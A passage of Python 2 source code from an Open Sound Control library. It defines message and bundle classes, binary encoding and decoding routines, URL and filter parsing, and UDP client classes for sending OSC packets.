for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in self.values())
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return self.values()[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = self.items()
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = values.items()
elif type(values) == types.ListType:
items = []
for val in values:
if type(val) == types.TupleType:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == types.TupleType:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = self.items()
new_items = self._buildItemList(val)
if type(i) != types.SliceType:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = self.items()
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return self.values().count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return self.values().index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = self.items() + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = self.items()
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = self.items()
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = self.items()
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = self.items()
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(m))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(self.values())
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(self.items())
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objectss are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in self.values():
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsuated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == types.DictType:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a mutiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in types.StringTypes:
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', long(secs), long(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0L, 1L)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = string.find(data,"\0")
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length], data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print "Error: too few bytes for int", data, len(data)
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (long(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print "Error: too few bytes for float", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print "Error: too few bytes for double", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print "byte 0 1 2 3 4 5 6 7 8 9 A B C D E F"
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print "%s: %s" % (line, repr(bytes[i-15:i+1]))
line = ""
bytes_left = num % 16
if bytes_left:
print "%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:]))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == types.TupleType:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == types.IntType:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (type(url) in types.StringTypes and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
self._fd = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
# phillip: set multicast TTL
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
sockEqual = cmp(self.socket._sock, other.socket._sock)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
return cmp(self.server, other.server)
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error, e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in types.StringTypes:
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in filters.keys():
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in filters.values():
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in filters.items():
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets'. and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in self.targets.keys():
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in src.keys(): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in src.items():
if (addr in dst.keys()) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in self.targets.keys():
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in types.StringTypes:
(_, filters) = parseFilterStr(filters)
elif type(filters) != types.DictType:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
elif (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in self.targets.keys():
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in self.targets.items():
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in self.targets.keys()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in dict.items():
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in self.targets.items():
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = out.values()
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in filters.keys():
if filters['/*']:
out = msg
else:
out = None
elif False in filters.values():
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in filters.keys():
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = out.values()
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in self.targets.items():
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return self.callbacks.keys()
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the receied message
- tags (string): The OSC-typetags of the receied message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in self.callbacks.keys():
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
